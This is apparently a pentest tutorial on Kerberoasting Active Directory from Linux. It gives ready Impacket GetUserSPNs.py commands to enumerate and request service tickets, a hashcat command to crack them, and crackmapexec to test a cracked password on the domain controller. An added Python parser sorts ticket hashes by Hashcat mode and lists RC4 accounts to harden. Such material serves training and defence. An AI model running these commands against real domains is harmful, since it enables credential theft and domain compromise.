🔥 Kerberoasting with Linux

Kerberoasting

Kerberoasting is a lateral movement / privilege escalation technique in Active Directory (AD) environments.

This attack targets accounts that have a Service Principal Name (SPN) set. SPNs are the unique identifiers Kerberos uses to map a service instance to a service account. Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY

We can execute the attack in several ways:

  • From a non-domain joined Linux host using valid domain creds

  • From a domain-joined Linux host as root after retrieving the keytab file

  • From a domain-joined Windows host authenticated as a domain user

  • From a domain-joined Windows host with a shell in the context of a domain account

  • As SYSTEM on a domain-joined Windows host

  • From a non-domain joined Windows host using runas /netonly

Obtaining a TGS ticket through Kerberoasting does not guarantee a set of valid credentials: the ticket must still be cracked offline to recover the cleartext password.

A prerequisite to performing Kerberoasting attacks is either domain user credentials (cleartext, or just an NTLM hash if using Impacket), a shell in the context of a domain user, or an account such as SYSTEM. Once we have this level of access, we can start. We must also know which host in the domain is a Domain Controller so we can query it.

Impacket Tools

The Impacket tools let us query SPN accounts from the KDC; we only need a valid set of domain credentials.

GetUserSPNs.py

We start by using this tool to gather a list of SPNs in the domain. We will need a set of valid domain credentials and the IP of a Domain Controller.

We can authenticate to the DC with a cleartext password, NT hash or a Kerberos ticket.

The command below will ask for a password and then print a list of all SPN accounts.

GetUserSPNs.py -dc-ip DC-IP DOMAIN.LOCAL/USER

If we find an SPN account that is a member of the Domain Admins group, we can try to retrieve and crack its ticket, which could lead to full domain compromise.

Requesting TGS Tickets

We can pull all TGS tickets by adding -request; they are output in a format ready to send to Hashcat for offline cracking.

GetUserSPNs.py -dc-ip DC-IP DOMAIN.LOCAL/USER -request

We can also request a single TGS ticket for one account with -request-user:

GetUserSPNs.py -dc-ip DC-IP DOMAIN.LOCAL/USER -request-user TARGET-USER

We can save the ticket(s) to a file with -outputfile FILENAME.

Cracking Tickets with Hashcat

hashcat -m 13100 tgs /usr/share/wordlists/rockyou.txt
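The parser below is an added example; it is not part of the original page or of Impacket. It reads the lines that GetUserSPNs.py writes with -outputfile, extracts the account, realm, SPN and encryption type from each, and picks the matching Hashcat mode (13100 for RC4 / etype 23, which the command above assumes; 19600 and 19700 for the AES etypes 17 and 18, which crack far slower). Read from the defender's side, the same parse lists which service accounts still hand out RC4 tickets: those are the accounts to move to AES-only encryption, long random passwords or gMSAs. The two sample lines are constructed; the hex values are filler, not real ticket material.

```python
"""Parse Kerberoast hashes in the layout GetUserSPNs.py -outputfile produces.

Added example, not code from the page or from Impacket. SAMPLE_OUTPUT is
constructed: the hex checksum/edata fields are filler, not real tickets.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Hashcat mode for a Kerberos 5 TGS-REP hash, keyed by encryption type.
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# etype 23 (RC4) layout:    $krb5tgs$23$*user$REALM$spn*$checksum(32 hex)$edata
# etype 17/18 (AES) layout: $krb5tgs$17$user$REALM$*spn*$checksum(24 hex)$edata
_RC4 = re.compile(
    r"^\$krb5tgs\$23\$\*([^$]+)\$([^$]+)\$([^*]+)\*\$([0-9a-fA-F]{32})\$([0-9a-fA-F]+)$"
)
_AES = re.compile(
    r"^\$krb5tgs\$(17|18)\$([^$]+)\$([^$]+)\$\*([^*]+)\*\$([0-9a-fA-F]{24})\$([0-9a-fA-F]+)$"
)

# Constructed sample: one RC4 ticket and one AES256 ticket (filler hex).
SAMPLE_OUTPUT = """\
$krb5tgs$23$*sqlsvc$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$0123456789abcdef0123456789abcdef$ab12cd34ef56ab12cd34ef56ab12cd34ef56
$krb5tgs$18$backupsvc$DOMAIN.LOCAL$*cifs/backup01.domain.local*$0123456789abcdef01234567$ab12cd34ef56ab12cd34ef56
"""


@dataclass(frozen=True)
class RoastHash:
    etype: int
    user: str
    realm: str
    spn: str
    checksum: str
    edata: str

    @property
    def hashcat_mode(self) -> int:
        return HASHCAT_MODES[self.etype]

    @property
    def rc4(self) -> bool:
        """True when the service account still issued an RC4 (etype 23) ticket."""
        return self.etype == 23


def parse_line(line: str) -> RoastHash:
    """Parse one $krb5tgs$ line; raise ValueError for anything else."""
    m = _RC4.match(line)
    if m:
        user, realm, spn, checksum, edata = m.groups()
        return RoastHash(23, user, realm, spn, checksum, edata)
    m = _AES.match(line)
    if m:
        etype, user, realm, spn, checksum, edata = m.groups()
        return RoastHash(int(etype), user, realm, spn, checksum, edata)
    raise ValueError(f"not a recognised $krb5tgs$ hash: {line[:40]!r}")


def parse_output(text: str) -> list[RoastHash]:
    """Parse a whole -outputfile, skipping blank lines."""
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def group_by_mode(hashes: list[RoastHash]) -> dict[int, list[RoastHash]]:
    """Map Hashcat mode -> hashes, because each mode needs its own input file."""
    grouped: dict[int, list[RoastHash]] = {}
    for h in hashes:
        grouped.setdefault(h.hashcat_mode, []).append(h)
    return grouped


def rc4_accounts(hashes: list[RoastHash]) -> list[str]:
    """Service accounts whose tickets came back as RC4: the hardening backlog."""
    return sorted({h.user for h in hashes if h.rc4})


if __name__ == "__main__":
    parsed = parse_output(SAMPLE_OUTPUT)
    for mode, items in sorted(group_by_mode(parsed).items()):
        print(f"hashcat -m {mode}: {[h.user for h in items]}")
    print("RC4 tickets still issued for:", rc4_accounts(parsed))
```

Feeding a real -outputfile through parse_output and writing one file per Hashcat mode avoids the silent failure where AES lines are passed to -m 13100 and simply rejected; the rc4_accounts list is the same data read as a hardening backlog.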

Testing Access against the DC

Once a password is cracked, we can confirm our access with a tool like crackmapexec:

sudo crackmapexec smb DC-IP -u USER -p CRACKED-PASSWORD
